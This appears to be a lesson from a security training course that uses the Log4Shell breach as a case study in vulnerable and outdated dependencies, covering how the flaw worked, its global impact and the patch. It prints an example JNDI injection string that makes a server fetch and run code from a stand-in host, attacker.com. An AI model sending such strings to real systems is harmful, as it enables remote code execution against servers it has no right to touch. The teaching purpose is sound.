Task 1 of 6

Real Breach: Log4Shell — One Line That Broke the Internet

## The Most Critical Vulnerability in a Decade On 9 December 2021, a security researcher tweeted a proof-of-concept exploit for a vulnerability in **Log4j** — a Java logging library so ubiquitous it runs inside millions of products you've heard of: Minecraft, iCloud, LinkedIn, Twitter, Cloudflare, Amazon AWS, Tesla. The attack was devastating in its simplicity. Log4j logged user input — usernames, search queries, HTTP headers — and it would automatically *resolve* certain special strings it found in that input. The payload looked like this: ``` {jndi:ldap://attacker.com/exploit{'}'} ``` Type that as your Minecraft username. The server logs it. Log4j sees it. Log4j reaches out to attacker.com, downloads a Java class file, and **executes it**. Full remote code execution. No credentials needed. No prior access. One string in a text field. --- ### The Scale Was Unprecedented Within **72 hours** of public disclosure: - **Over 800,000 exploit attempts** were detected per hour globally - Nation-state groups (China, Iran, North Korea) were confirmed exploiting it within days - CISA issued an emergency directive to all US federal agencies - Governments worldwide issued emergency bulletins The fix? Update Log4j to a patched version. But first you have to know you're using it. Thousands of companies didn't even know Log4j was in their stack — it was a transitive dependency, pulled in by a library that was pulled in by another library. --- ### Why This Matters for Vulnerable Components Log4Shell is the ultimate case study for OWASP A06 — Vulnerable and Outdated Components. The vulnerability was in a library, not in any company's own code. The exploit was trivial. The fix was one version bump. The damage was measured in the billions. **The lesson:** your app is only as secure as every library it depends on.